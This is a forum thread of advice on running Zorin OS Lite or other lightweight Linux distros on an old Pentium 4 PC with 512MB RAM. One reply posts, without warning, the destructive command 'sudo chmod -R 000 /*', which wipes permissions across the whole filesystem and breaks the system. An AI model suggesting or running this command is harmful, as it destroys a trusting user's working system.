Can I install programs on Zorin OS Lite like with other distros? and Driver fears.

I’ve decided to set up my PC for dual booting as I’ve heard linux is less of a ram hog and this can help me run programs faster than in Windows 7.

I’ve decided to go with Zorin OS lite and I have a question I can’t seem to find when I tried googling; Can I install programs in the lite version? and does Linux come with basic drivers for audio and network?

Edit:

Here are the specs outlined;

• CPU: Pentium 4 @ 3.6 ghz, 1 core, 2 Logical cores
  • Mobo: ECS P4M800PRO-M
  • RAM: 512MB DDR2 @ 553mhz
  • Storage: Seagate Barracuda 120GB 7200rpm

3 minutes ago, betatestedurm0m said:

Can I install programs in the lite version?

Yes

3 minutes ago, betatestedurm0m said:

and does Linux come with basic drivers for audio and network?

Yes but depending on your hardware you may need to install additional drivers.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

you can try lubuntu its a very good distro for old systems and has a very good support

if it was useful give it a like :) btw if your into linux pay a visit here

Yes you can, but I'd be surprised it ran worth a crap!

Old P4s with 512MB RAM -- Slitaz, Tiny Core, Puppy, Slax, Porteus -- ALL 32bit non-PAE distros without a DE -- look at this webpage for more suggestions -- anyone who has ever run a machine such as you describe knows that even lubuntu 32bit is pushing it !   AntiX 32bit with a swapfile may work best, but you'll need help (i.e. from the antiX forum) to set it up, most likely.  I'd go with either Slitaz or Tiny Core, myself!

Best wishes!  Let us know what you find

On 7/31/2020 at 9:51 PM, mahyar said:

you can try lubuntu its a very good distro for old systems and has a very good support

Thanks

On 8/1/2020 at 3:43 AM, sp331yi said:

Yes you can, but I'd be surprised it ran worth a crap!

Old P4s with 512MB RAM -- Slitaz, Tiny Core, Puppy, Slax, Porteus -- ALL 32bit non-PAE distros without a DE -- look at this webpage for more suggestions -- anyone who has ever run a machine such as you describe knows that even lubuntu 32bit is pushing it !   AntiX 32bit with a swapfile may work best, but you'll need help (i.e. from the antiX forum) to set it up, most likely.  I'd go with either Slitaz or Tiny Core, myself!

Best wishes!  Let us know what you find

Thanks a lot. I’ll dig into the forum.

I had to use a laptop on Intel Core Solo for a year in 2018, and Lubuntu made it semi-usable for some time (I upgraded it up to 4 Gb of RAM though, otherwise even 1 Firefox tab would be painful). Even then, LXDE consumes up to 300 MB of RAM on the start, so, if you really cannot get your PC up to at least 1 Gb of RAM, the best option would probably be to install the latest available 32-bit Ubuntu Server and then just run your apps from a command line, without DE at all.

On 8/6/2020 at 2:44 PM, Alexeygridnev1993 said:

. . . then just run your apps from a command line, without DE at all.

Or a very light-weight distro without a DE, only a WM, as those suggested.

@Alexeygridnev1993 -- very few Americans want to run from command line only -- too spoiled by 'convenience' -- that's one big reason we're losing our Freedom (that and lack of responsiblilty -- looking for easy answers).

21 hours ago, sp331yi said:

Or a very light-weight distro without a DE, only a WM, as those suggested.

@Alexeygridnev1993 -- very few Americans want to run from command line only -- too spoiled by 'convenience' -- that's one big reason we're losing our Freedom (that and lack of responsiblilty -- looking for easy answers).

If I can learn how to run everything from command line only (and get an operating system to boot on this damn thing) I’d definitely give it a try and I’m not even remotely American :))